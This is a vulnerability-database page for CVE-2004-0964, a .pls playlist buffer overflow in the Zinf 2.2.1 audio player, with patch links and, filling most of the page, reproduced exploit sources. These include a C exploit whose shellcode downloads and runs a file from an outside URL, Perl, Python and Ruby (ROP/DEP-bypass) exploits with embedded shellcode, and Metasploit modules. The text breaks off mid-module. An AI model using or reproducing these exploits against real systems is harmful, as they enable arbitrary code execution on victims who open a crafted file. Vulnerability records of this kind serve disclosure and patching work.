CVE-2004-0964
CVSS 10.0
Published: 2005-02-09 00:00:00
Revised: 2016-10-17 22:50:14

[Original] Buffer overflow in Zinf 2.2.1 on Windows, and other older versions for Linux, allows remote attackers or local users to execute arbitrary code via certain values in a .pls file.


[CNNVD] Zinf Malformed Playlist File Remote Buffer Overflow Vulnerability (CNNVD-200502-036)

        Zinf is a music player.
        A buffer overflow in Zinf 2.2.1 on Windows, and in other older Linux versions, allows remote attackers or local users to execute arbitrary code via certain values in a .pls file.

- CVSS (base score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/o:debian:debian_linux:3.0::m68k
cpe:/o:debian:debian_linux:3.0::ia-32
cpe:/o:debian:debian_linux:3.0::sparc
cpe:/o:debian:debian_linux:3.0::ppc
cpe:/o:debian:debian_linux:3.0::arm
cpe:/o:debian:debian_linux:3.0::mipsel
cpe:/o:debian:debian_linux:3.0::hppa
cpe:/o:debian:debian_linux:3.0::ia-64
cpe:/o:debian:debian_linux:3.0::mips
cpe:/o:debian:debian_linux:3.0::s-390
cpe:/a:zinf:zinf:2.2.1
cpe:/o:debian:debian_linux:3.0::alpha

- OVAL (technical details for detection)

No matching OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0964
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0964
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200502-036
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=109608092609200&w=2
(UNKNOWN)  BUGTRAQ  20040924 Buffer overflow in Zinf 2.2.1 for Win32
http://marc.info/?l=bugtraq&m=109638486728548&w=2
(UNKNOWN)  BUGTRAQ  20040927 Re: Buffer overflow in Zinf 2.2.1 for Win32+exploit
http://securityreason.com/securityalert/8341
(UNKNOWN)  SREASON  8341
http://www.debian.org/security/2004/dsa-587
(VENDOR_ADVISORY)  DEBIAN  DSA-587
http://www.securityfocus.com/bid/11248
(VENDOR_ADVISORY)  BID  11248
http://xforce.iss.net/xforce/xfdb/17491
(VENDOR_ADVISORY)  XF  zinf-pls-bo(17491)

- Vulnerability information

Zinf Malformed Playlist File Remote Buffer Overflow Vulnerability
Critical  Buffer overflow
2005-02-09 00:00:00 2005-10-20 00:00:00
Remote
        Zinf is a music player.
        A buffer overflow in Zinf 2.2.1 on Windows, and in other older Linux versions, allows remote attackers or local users to execute arbitrary code via certain values in a .pls file.

- Advisories and patches

        The vendor has released upgrade patches that fix this security issue; download links:
        Debian Linux 3.0 hppa
        Debian freeamp-extras_2.1.1.0-4woody2_hppa.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/f/freeamp/freeamp-extras_2.1.1.0-4woody2_hppa.deb
        Debian freeamp_2.1.1.0-4woody2_hppa.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/f/freeamp/freeamp_2.1.1.0-4woody2_hppa.deb
        Debian libfreeamp-esound_2.1.1.0-4woody2_hppa.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/f/freeamp/libfreeamp-esound_2.1.1.0-4woody2_hppa.deb
        Debian Linux 3.0 ppc
        Debian freeamp-extras_2.1.1.0-4woody2_powerpc.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/f/freeamp/freeamp-extras_2.1.1.0-4woody2_powerpc.deb
        Debian freeamp_2.1.1.0-4woody2_powerpc.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/f/freeamp/freeamp_2.1.1.0-4woody2_powerpc.deb
        Debian libfreeamp-alsa_2.1.1.0-4woody2_powerpc.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/f/freeamp/libfreeamp-alsa_2.1.1.0-4woody2_powerpc.deb
        Debian libfreeamp-esound_2.1.1.0-4woody2_powerpc.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/f/freeamp/libfreeamp-esound_2.1.1.0-4woody2_powerpc.deb
        Debian Linux 3.0 s/390
        Debian freeamp-extras_2.1.1.0-4woody2_s390.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/f/freeamp/freeamp-extras_2.1.1.0-4woody2_s390.deb
        Debian freeamp_2.1.1.0-4woody2_s390.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/f/freeamp/freeamp_2.1.1.0-4woody2_s390.deb
        Debian libfreeamp-esound_2.1.1.0-4woody2_s390.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/f/freeamp/libfreeamp-esound_2.1.1.0-4woody2_s390.deb
        Debian Linux 3.0 arm
        Debian freeamp-extras_2.1.1.0-4woody2_arm.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/f/freeamp/freeamp-extras_2.1.1.0-4woody2_arm.deb
        Debian freeamp_2.1.1.0-4woody2_arm.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/f/freeamp/freeamp_2.1.1.0-4woody2_arm.deb
        Debian libfreeamp-alsa_2.1.1.0-4woody2_arm.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/f/freeamp/libfreeamp-alsa_2.1.1.0-4woody2_arm.deb
        Debian libfreeamp-esound_2.1.1.0-4woody2_arm.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/f/freeamp/libfreeamp-esound_2.1.1.0-4woody2_arm.deb
        Debian Linux 3.0 alpha
        Debian freeamp-extras_2.1.1.0-4woody2_alpha.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/f/freeamp/freeamp-extras_2.1.1.0-4woody2_alpha.deb
        Debian freeamp_2.1.1.0-4woody2_alpha.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/f/freeamp/freeamp_2.1.1.0-4woody2_alpha.deb
        Debian libfreeamp-alsa_2.1.1.0-4woody2_alpha.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/f/freeamp/libfreeamp-alsa_2.1.1.0-4woody2_alpha.deb
        Debian libfreeamp-esound_2.1.1.0-4woody2_alpha.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/f/freeamp/libfreeamp-esound_2.1.1.0-4woody2_alpha.deb

- Vulnerability information (559)

Zinf 2.2.1 Local Buffer Overflow Exploit (EDBID:559)
windows local
2004-09-28 Verified
0 Delikon
/*
-------------------------------Advisory----------------------------------
Luigi Auriemma <aluigi(aaaatttttt)autistici[D000t]org>

I don't know why this bug has not been tracked but moreover I don't
completely know why it has not been fixed yet in the Windows version of
Zinf.

In short, Zinf is an audio player for Linux and Windows: http://www.zinf.org
The latest Linux version is 2.2.5 while the latest Windows version is 2.2.1
which is still vulnerable to a buffer-overflow bug in the management of the
playlist files ".pls".

This bug has been found and fixed by the same developers in the recent
versions for Linux but, as already said, the vulnerable Windows version is
still downloadable and can be exploited locally and remotely through the web
browser and a malicious pls file.

A simple proof-of-concept to test the bug is available here:

  http://aluigi.altervista.org/poc/zinf-bof.pls

That's all, just to keep track of this bug and to warn who uses the Windows
version.


BYEZ
--------------------------------------------------------------------------
hey Luigi, how many advisories do you release every month?? maybe 30 ;)??
sometimes I think your day has 48 hours ;)

best regards



----------------------------------------------------------------------------
This exploit generates a file exploit.pls which overflows an SEH handler,
jumps into a service-pack-independent address, then downloads and executes a file.


  You can also download this exploit in a rar file (www.delikon.de).
  In this rar file you will find some screenshots from OllyDbg,
  which may be useful for beginners.


*/

#include <stdio.h>
#include <windows.h>

#define SIZE 4048


char shellcode[] = "\xEB"//xored with 0x1d
"\x10\x58\x31\xC9\x66\x81\xE9\x22\xFF\x80\x30\x1D\x40\xE2\xFA\xEB\x05\xE8\xEB\xFF"
"\xFF\xFF\xF4\xD1\x1D\x1D\x1D\x42\xF5\x4B\x1D\x1D\x1D\x94\xDE\x4D\x75\x93\x53\x13"
"\xF1\xF5\x7D\x1D\x1D\x1D\x2C\xD4\x7B\xA4\x72\x73\x4C\x75\x68\x6F\x71\x70\x49\xE2"
"\xCD\x4D\x75\x2B\x07\x32\x6D\xF5\x5B\x1D\x1D\x1D\x2C\xD4\x4C\x4C\x90\x2A\x4B\x90"
"\x6A\x15\x4B\x4C\xE2\xCD\x4E\x75\x85\xE3\x97\x13\xF5\x30\x1D\x1D\x1D\x4C\x4A\xE2"
"\xCD\x2C\xD4\x54\xFF\xE3\x4E\x75\x63\xC5\xFF\x6E\xF5\x04\x1D\x1D\x1D\xE2\xCD\x48"
"\x4B\x79\xBC\x2D\x1D\x1D\x1D\x96\x5D\x11\x96\x6D\x01\xB0\x96\x75\x15\x94\xF5\x43"
"\x40\xDE\x4E\x48\x4B\x4A\x96\x71\x39\x05\x96\x58\x21\x96\x49\x18\x65\x1C\xF7\x96"
"\x57\x05\x96\x47\x3D\x1C\xF6\xFE\x28\x54\x96\x29\x96\x1C\xF3\x2C\xE2\xE1\x2C\xDD"
"\xB1\x25\xFD\x69\x1A\xDC\xD2\x10\x1C\xDA\xF6\xEF\x26\x61\x39\x09\x68\xFC\x96\x47"
"\x39\x1C\xF6\x7B\x96\x11\x56\x96\x47\x01\x1C\xF6\x96\x19\x96\x1C\xF5\xF4\x1F\x1D"
"\x1D\x1D\x2C\xDD\x94\xF7\x42\x43\x40\x46\xDE\xF5\x32\xE2\xE2\xE2\x70\x75\x75\x33"
"\x78\x65\x78\x1D";







int main(){

char buffer[SIZE];
char exploit[]="exploit.pls";
char head[]="[playlist]File1=";
int i=0;
ULONG bytes=0;
char *pointer=NULL;
//for the decoder
short int weblength=0xff22;


ULONG RetAddr=0x10404DC4;
/*
SERVICE PACK independent
httpinput.pmi
10404DC4    5D              POP EBP
10404DC5    B8 18000000     MOV EAX,18
10404DCA    5B              POP EBX
10404DCB    C2 0800         RETN 8
*/
//jump into nops
DWORD jump=0x909025eb;
HANDLE file=NULL;

//this is a small messageBox app
char web[]="http://www.delikon.de/klein.exe";


printf("A Buffer overflow exploit against Zinf 2.2.1 for Win32\n");
printf("Coded by Delikon|www.delikon.de|27.9.04\n");
printf("all credits goes to Luigi Auriemma\n");
printf("\n [+] generate exploit.pls\n");



memset(buffer,0x00,SIZE-1);


 file = CreateFile(exploit, GENERIC_WRITE,0,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_ARCHIVE,NULL);

if(file == (HANDLE)0xffffffff){

	printf("\t[+] error opening the file\n");
	printf("PRESS A KEY\n");
	getchar();
	return -1;

}	
	strcpy(buffer,head);
	
	memset(buffer+strlen(buffer),0x61,17);
	//nops
	memset(buffer+strlen(buffer),0x90,20);
	//
	strcat(buffer,shellcode);
	//search for the shellcode length
	pointer=strstr(buffer,"\x22\xff");
	//weblength[0]-=strlen(web)+1;
	weblength-=strlen(web)+1;
	//increase it
	memcpy(pointer,&weblength,2);
	

	//copy the url in the buffer
	strcat(buffer,web);


	//xor the url with 0x1d
	while(*(buffer+strlen(buffer)-strlen(web)+i)){

	
		*(buffer+strlen(buffer)-strlen(web)+i)=*(buffer+strlen(buffer)-strlen(web)+i)^0x1d;
		i++;
	}
	
	*(buffer+strlen(buffer)-strlen(web)+i)=0x1d;

	//copy the filling
	memset(buffer+strlen(buffer),0x61,517-strlen(buffer));
	//also filling ;)
	memcpy(buffer+strlen(buffer),&RetAddr,4);
	
	memset(buffer+strlen(buffer),0x41,4);
	memset(buffer+strlen(buffer),0x42,4);
		
	//jump 24 bytes forward
	memcpy(buffer+strlen(buffer),&jump,4);
	//jump into pop reg pop reg ret
	memcpy(buffer+strlen(buffer),&RetAddr,4);
	memset(buffer+strlen(buffer),0x45,4);
	memset(buffer+strlen(buffer),0x46,4);
	memset(buffer+strlen(buffer),0x47,4);
	
	

	WriteFile(file,buffer,strlen(buffer),&bytes,0);

	CloseHandle(file);
	printf("\n [+] ready press a key\n");
	getchar();


	exit(1);

	
}

// milw0rm.com [2004-09-28]
		

- Vulnerability information (7887)

Zinf Audio Player 2.2.1 (PLS File) Stack Overflow PoC (EDBID:7887)
windows dos
2009-01-27 Verified
0 Hakxer
#!/usr/bin/perl
# Discovered & Written by : Hakxer
# Home : www.sec-geeks.com
# Program : http://www.zinf.org/ ../http://prdownloads.sourceforge.net/zinf/zinf-setup-2.2.1.exe
# Zinf Audio Player 2.2.1 (PLS FILE)  Buffer Overflow PoC

my $chars="\x90" x 2000;

open(MYFILE,'>>hakxer.pls');

print MYFILE $chars;

close(MYFILE);

print " PoC Created .. Hakxer [ Sec-Geeks.com ] EgY Coders Team";

# milw0rm.com [2009-01-27]
		

- Vulnerability information (7888)

Zinf Audio Player 2.2.1 (PLS File) Local Buffer Overflow Exploit (univ) (EDBID:7888)
windows local
2009-01-28 Verified
0 Houssamix
#!/usr/bin/perl -w

# Author : Houssamix

# Zinf Audio Player 2.2.1 (PLS File) Universal Local Buffer Overflow exploit
# tested in windows pro Sp 2 (french)



print "===================================================================== \n";
print "Author : Houssamix 						     \n";
print "===================================================================== \n";
print "Zinf Audio Player 2.2.1  Universal Local Buffer Overflow exploit	      \n";
print "===================================================================== \n";


my $overflow = "\x41" x 1300;
my $ret = "\xC8\x2C\x00\x10"; #0x10002CC8  push esp - ret > universal adress(vorbisfile.dll)
my $nop = "\x90" x 128 ;

# win32_exec -  EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
"\x42\x30\x42\x50\x42\x30\x4b\x58\x45\x34\x4e\x43\x4b\x48\x4e\x37".
"\x45\x30\x4a\x57\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x41\x4b\x58".
"\x4f\x55\x42\x42\x41\x50\x4b\x4e\x49\x34\x4b\x58\x46\x53\x4b\x38".
"\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c".
"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x33\x46\x35\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x58".
"\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x36\x4b\x48\x4e\x50\x4b\x54".
"\x4b\x38\x4f\x45\x4e\x31\x41\x50\x4b\x4e\x4b\x48\x4e\x51\x4b\x38".
"\x41\x50\x4b\x4e\x49\x48\x4e\x55\x46\x32\x46\x50\x43\x4c\x41\x43".
"\x42\x4c\x46\x56\x4b\x48\x42\x34\x42\x53\x45\x58\x42\x4c\x4a\x57".
"\x4e\x30\x4b\x48\x42\x44\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
"\x4b\x38\x4a\x46\x4a\x50\x4b\x4e\x49\x50\x4b\x58\x42\x58\x42\x4b".
"\x42\x30\x42\x30\x42\x30\x4b\x58\x4a\x46\x4e\x43\x4f\x45\x41\x43".
"\x48\x4f\x42\x46\x48\x35\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x47".
"\x42\x35\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x35\x4a\x36\x4a\x39".
"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x36".
"\x4e\x56\x43\x36\x42\x50\x5a";


my $file="hsmx.pls";

$exploit = $overflow.$ret.$nop.$shellcode;

open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $exploit ;


close($FILE);
print "$file has been created \n";

# milw0rm.com [2009-01-28]
		

- Vulnerability information (8267)

Zinf Audio Player 2.2.1 (.pls) Universal Seh Overwrite Exploit (EDBID:8267)
windows local
2009-03-23 Verified
0 His0k4
#usage: exploit.py
print "**************************************************************************"
print " Zinf Audio Player 2.2.1 (.pls) Universal Seh Overwrite Exploit\n"
print " Founder: Hakxer"
print " Exploited by : His0k4"
print " Tested on: Windows XP Pro SP2 Fr\n"
print " Greetings to:"
print " All friends & muslims HaCkers(dz), www.secdz.com\n"
print "**************************************************************************"
 
# win32_exec -  EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com 
shellcode=(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
"\x42\x30\x42\x50\x42\x30\x4b\x58\x45\x34\x4e\x53\x4b\x48\x4e\x57"
"\x45\x30\x4a\x37\x41\x50\x4f\x4e\x4b\x48\x4f\x34\x4a\x51\x4b\x48"
"\x4f\x35\x42\x52\x41\x30\x4b\x4e\x49\x34\x4b\x58\x46\x33\x4b\x58"
"\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c"
"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x43\x46\x35\x46\x42\x46\x30\x45\x47\x45\x4e\x4b\x48"
"\x4f\x35\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x38\x4e\x30\x4b\x34"
"\x4b\x58\x4f\x45\x4e\x51\x41\x30\x4b\x4e\x4b\x58\x4e\x31\x4b\x58"
"\x41\x30\x4b\x4e\x49\x48\x4e\x45\x46\x52\x46\x50\x43\x4c\x41\x33"
"\x42\x4c\x46\x56\x4b\x58\x42\x34\x42\x53\x45\x38\x42\x4c\x4a\x47"
"\x4e\x30\x4b\x38\x42\x34\x4e\x30\x4b\x48\x42\x47\x4e\x51\x4d\x4a"
"\x4b\x48\x4a\x46\x4a\x50\x4b\x4e\x49\x50\x4b\x58\x42\x38\x42\x4b"
"\x42\x30\x42\x50\x42\x50\x4b\x58\x4a\x56\x4e\x33\x4f\x55\x41\x33"
"\x48\x4f\x42\x46\x48\x35\x49\x58\x4a\x4f\x43\x58\x42\x4c\x4b\x37"
"\x42\x55\x4a\x36\x42\x4f\x4c\x48\x46\x30\x4f\x45\x4a\x36\x4a\x39"
"\x50\x4f\x4c\x48\x50\x50\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x46"
"\x4e\x36\x43\x56\x42\x30\x5a")

exploit =   "\x41"*1424
exploit +=  "\xEB\x06\x90\x90"
exploit +=  "\x0C\x04\x05\x12" # zinf.ui
exploit +=  shellcode

try:
    out_file = open("exploit.pls",'w')
    out_file.write(exploit)
    out_file.close()
    print("\nExploit file created!\n")
except:
    print "Error"

# milw0rm.com [2009-03-23]
		

- Vulnerability information (16688)

Zinf Audio Player 2.2.1 (PLS File) Stack Buffer Overflow (EDBID:16688)
windows local
2010-11-24 Verified
0 metasploit
##
# $Id: zinfaudioplayer221_pls.rb 11127 2010-11-24 19:35:38Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::FILEFORMAT
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Zinf Audio Player 2.2.1 (PLS File) Stack Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack-based buffer overflow in the Zinf Audio Player 2.2.1.
				An attacker must send the file to victim and the victim must open the file.
				Alternatively it may be possible to execute code remotely via an embedded
				PLS file within a browser, when the PLS extention is registered to Zinf.
				This functionality has not been tested in this module.
			},
			'License'        => MSF_LICENSE,
			'Author'         => [ 'Trancek <trancek[at]yashira.org>', 'patrick' ],
			'Version'        => '$Revision: 11127 $',
			'References'     =>
				[
					[ 'CVE', '2004-0964' ],
					[ 'OSVDB', '10416' ],
					[ 'URL', 'http://www.milw0rm.com/exploits/7888' ],
					[ 'BID', '11248' ],
				],
			'Payload'        =>
				{
					'Space'    => 800,
					'BadChars' => "\x00\x0a\x0d\x3c\x22\x3e\x3d",
					'EncoderType'   => Msf::Encoder::Type::AlphanumMixed,
					'StackAdjustment' => -3500,
				},
			'Platform' => 'win',
			'Targets'        =>
				[
					# Tested by patrick - 20090429 xpsp3
					[ 'Zinf Universal 2.2.1', { 'Ret' => 0x1204f514 } ], #pop esi; pop ebx; ret - ./Plugins/zinf.ui
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Sep 24 2004',
			'DefaultTarget'  => 0))

		register_options(
			[
				OptString.new('FILENAME', [ true, 'The file name.',  'exploit_zinf.pls']),
			], self.class)

	end

	def exploit
		seh = generate_seh_payload(target.ret)
		filepls = rand_text_alpha_upper(1424) + seh

		print_status("Creating '#{datastore['FILENAME']}' file ...")

		file_create(filepls)

	end

end

		

- Vulnerability information (17600)

Zinf Audio Player v2.2.1 PLS File Buffer Overflow Vulnerability (DEP BYPASS) (EDBID:17600)
windows local
2011-08-03 Verified
0 C4SS!0 and h1ch4m
#!/usr/bin/ruby
#
#[+]Exploit Title: Zinf Audio Player v2.2.1 PLS File Buffer Overflow Vulnerability(DEP BYPASS)
#[+]Date: 03\08\2011
#[+]Author: C4SS!0 and h1ch4m
#[+]Found by: Delikon(http://www.exploit-db.com/exploits/559/) or also Metasploit(http://www.exploit-db.com/exploits/16688)
#[+]Software Link: http://sourceforge.net/projects/zinf/files/zinf/2.2.1/zinf-setup-2.2.1.exe/download
#[+]Version: 2.2.1
#[+]Tested on: Windows XP SP3 Brazilian Portuguese(DEP in AlwaysOn)
#[+]CVE: N/A
#
#
#Exploit Based in Corelan Team Tuturial https://www.corelan.be/index.php/2011/07/03/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py/
#LoadLibraryA("msvcr71.dll") + VirtualProtect()
#

sys = `ver`
if sys =~/Windows/
system("cls")
system("color 4f")
else
system("clear")
end
print '''

		Zinf Audio Player v2.2.1 PLS File Buffer Overflow Vulnerability(DEP BYPASS)
		Created by C4SS!0 and h1ch4m
		E-mails:
			C4SS!0 : louredo_@hotmail.com 
	        	h1ch4m : h1ch4m@hotmail.com 
		Sites: 
			C4SS!0 : net-fuzzer.blogspot.com
			h1ch4m : net-effects.blogspot.com
		
'''
sleep(3)
# Address of VirtualProtect 0x7C3528DD
#########################################ROP FOR LOAD "msvcr71.dll"#################################
rop = [0x10002a6f].pack('V') # PUSH ESP # POP EDI # POP ESI # POP EBP # MOV EAX,1 # POP EBX # ADD ESP,30 # RETN
rop += "A" * 12
rop += [0x0040556A].pack('V') # ADD ESP,54 # RETN // return address for LoadLibraryA: after LoadLibraryA runs, execution comes back HERE!!!
rop += "A" * (80-rop.length)
rop += [0x100014e8].pack('V') # MOV EAX,EDI # POP EDI # POP ESI # RETN
rop += "G"  * 8 # JUNK
rop += [0x1205017d].pack('V') # POP EBX # RETN    
rop += "\x00\x00\x00\x00"
rop += [0x1203678a].pack('V') # ADD EBX,EAX # NOP # NOP # NOP # NOP # RETN  
rop += [0x112054dd].pack('V') # XCHG EAX,EBP # RETN   REPLACE
rop += [0x00420044].pack('V') # POP EBP # RETN
rop += [0x0040556A].pack('V') # ADD ESP,54 # RETN // return address for LoadLibraryA: after LoadLibraryA runs, execution comes back HERE!!!
rop += [0x10001E11].pack('V') # POP EDI # RETN
rop += [0x7C801D7B].pack('V') # Address of LoadLibraryA  // fixes the EDI value for the PUSHAD
rop += [0x1200CA76].pack('V') # PUSHAD # RETN
rop += "msvcr71.dll\x00"
rop += "D" * 56
##########################################ROP END HERE####################################

##########################################ROP FOR VirtualProtect###########################
rop += [0x1200edf1].pack('V') # POP EDI # RETN
rop += "JJJJ" # JUNK
rop += [0x7C3528DD].pack('V') # Pointer to VirtualProtect
rop += [0x00409E6A].pack('V') # MOV EAX,EBX # POP EBX #  RETN 0c
rop += "PPPP"
rop += [0x0042044B].pack('V') * 3 # RETN
rop += [0x0040dc54].pack('V') # PUSH ESI # ADD AL,5E # POP EBP # RETN 04 
############################ADDING TO EAX######################################
rop += [0x7C3410C3].pack('V') # POP ECX # RETN
rop += [0x00000200].pack('V') # The value that will be added to EAX
rop += [0x7C358F2C].pack('V') # ADD EAX,ECX # POP ESI # RETN
rop += "GGGG"
#####################################################################################
rop += [0x0040fd82].pack('V') # XCHG EAX,ECX # POP EBP # RETN
rop += "BBBB"
rop += [0x1201dc80].pack('V') # MOV EAX,ECX # RETN  
rop += [0x1060fd8f].pack('V') # XCHG EAX,EBP # RETN 
################################CHANGES THE PARAMETER ADDRESS#######################################
rop += [0x1201dc80].pack('V') # MOV EAX,ECX # RETN  
rop += [0x12007AD6].pack('V') # POP EBX # RETN
rop += "\x00\x00\x00\x00"
rop += [0x7c3451b9].pack('V') # POP EDX # RETN
rop += "\x00\x00\x00\x00" 
rop += [0x1203678a].pack('V') # ADD EBX,EAX # NOP # NOP # NOP # NOP # RETN  // address of the last VirtualProtect parameter
rop += [0x1000333e].pack('V') # ADD EDX,EBX # POP EBX # RETN 10
rop += "QQQQ"
rop += [0x12007AD7].pack('V') * 10 # RETN
###################################################################################################
rop += [0x0040ba55].pack('V') # XCHG EAX,EDX # RETN  // available address
rop += [0x12011D0B].pack('V') # XCHG EAX,ECX # CMP EAX,5E5F0002 # RETN
rop += [0x12007AD7].pack('V') # RETN
rop += [0x10001436].pack('V') # MOV EAX,ECX # POP EBX # RETN
rop += "GGGG"
rop += [0x12007AD6].pack('V') # POP EBX # RETN
rop += "\x00\x03\x00\x00"
rop += [0x11601da9].pack('V') # POP EAX # RETN 
rop += "\x40\x00\x00\x00"
rop += [0x0040ba55].pack('V') # XCHG EAX,EDX # RETN
rop += [0x12026C85].pack('V') # PUSHAD # RETN
rop += "A" * 156
#########################Go to the shellcode after the VirtualProtect call###############
rop += [0x10002e13].pack('V')  # ADD EAX,ECX # RETN
rop += [0x10610e4d].pack('V')  # POP ECX # RETN
rop += [0x0000012b].pack('V')  # Value that will be added to EAX
rop += [0x10002e13].pack('V')  # ADD EAX,ECX # RETN
rop += [0x111025F1].pack('V')  # CALL EAX and JMP to my Shellcode. :)
##########################################ROP END HERE#####################################
shellcode = "\x44" * (50-0x12)
shellcode += 
"PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIONMRU2SJXH9KHNHYD4FDK"+
"D0XGC9YX1FRP1T0B2TCRPEBK3RJMNZ8GMLV879DONSVQXK7FWLCSIJ5VLO0WXWYWVLDO0O2SZGL62OVO"+
"RP3N3DMMERZJDY3R9N0Q695JE6J3KEUYGM5LNQTR0EK3PUDYY0PN3MY3NQ4KX980PGSPPN3N5L3Q5RI9"+ #Shellcode Alpha Numeric WinExec "Calc.exe"
"GQ3J5M6MO9KMMOQ7OHZT2X2SLLUKOS1L6VDN6QKJWUGTV07YVMHMKQY4N5NG4WLE4QML9QWOOELVEXMQ"+ #Baseaddress EAX.
"2LFNN2UMWFWE2KSPLWK8OSWDJ1O8NOTGPQK1K0KJGZJ5OE8VCNW9T4Q2RUMOZ6NCTL9TSLKJNZKW0NMN"+
"LSQMFWOHKHLLX7ON4SNZQ4NQO4QMVLNMZPVD89ULWKNTQMP0M1S3L6SNXMWBYNPPIT73NOXWKRRVZRN8"+
"WDN0SUK8WOMV4DNNTWPYWN27KA"
buf = "A" * 1300
buf += rop
buf += shellcode

print "\t\t[+]Creating Exploit File...\n"
sleep(1)
begin
File.open("Exploit.pls","wb") do |f| 
f.write buf
f.close
print "\t\t[+]File Exploit.pls create successfully.\n"
sleep(1)
end
rescue
print "**[-]Error: #{$!}\n"
exit(0)
end		

- Vulnerability information (F83051)

Zinf Audio Player 2.2.1 (PLS File) Stack Overflow. (PacketStormID:F83051)
2009-11-26 00:00:00
patrick,Trancek  metasploit.com
exploit,overflow
CVE-2004-0964

This Metasploit module exploits a stack-based buffer overflow in the Zinf Audio Player 2.2.1. An attacker must send the file to the victim and the victim must open the file. Alternatively it may be possible to execute code remotely via an embedded PLS file within a browser, when the PLS extension is registered to Zinf. This functionality has not been tested in this module.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::FILEFORMAT
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Zinf Audio Player 2.2.1 (PLS File) Stack Overflow.',
			'Description'    => %q{
					This module exploits a stack-based buffer overflow in the Zinf Audio Player 2.2.1.
					An attacker must send the file to victim and the victim must open the file.
					Alternatively it may be possible to execute code remotely via an embedded
